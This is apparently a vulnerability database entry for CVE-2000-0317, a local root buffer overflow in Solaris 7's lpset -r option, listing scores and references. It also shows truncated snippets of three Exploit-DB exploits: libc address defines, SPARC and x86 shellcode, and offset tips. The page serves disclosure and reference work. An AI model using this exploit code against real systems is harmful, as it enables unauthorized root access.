CVE-2000-0317
Published 2000-04-24
CVE-2000-0317: Buffer overflow in Solaris 7 lpset allows local users to gain root privileges via a long -r option.
Priority P4 25 | high 7.2 | CVSS 2.0
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.22% (64.9th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
No detection rules found.
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
exploitdb·2000-04-24
---
/*
source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well-crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
i
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
exploitdb·2000-04-24
---
// source: https://www.securityfocus.com/bid/1138/info
//
// A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well-crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
#include
#include
#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200
#define NOP 0xac15a16e
#define EXSTART 116
char sparc_shellcode[] =
/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)
exploitdb·2000-04-24
---
// source: https://www.securityfocus.com/bid/1138/info
//
// A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well-crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
/*
*
* solaris 2.7 lpset local exploit, i386.
* discovered by: duke
* not the same as on bt.
* if exploit doesn't work try offset from 300-450
*
* greets: duke, #!ADM, #!security.is, #hax
*
* DiGiT - [email protected]
*
*/
#include
#include
#include
#include
char shellcode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/bugtraq/2000-04/0192.html
http://archives.neohapsis.com/archives/bugtraq/2000-04/0236.html
http://marc.info/?l=bugtraq&m=95729763119559&w=2
http://www.securityfocus.com/bid/1138
Published: 2000-04-24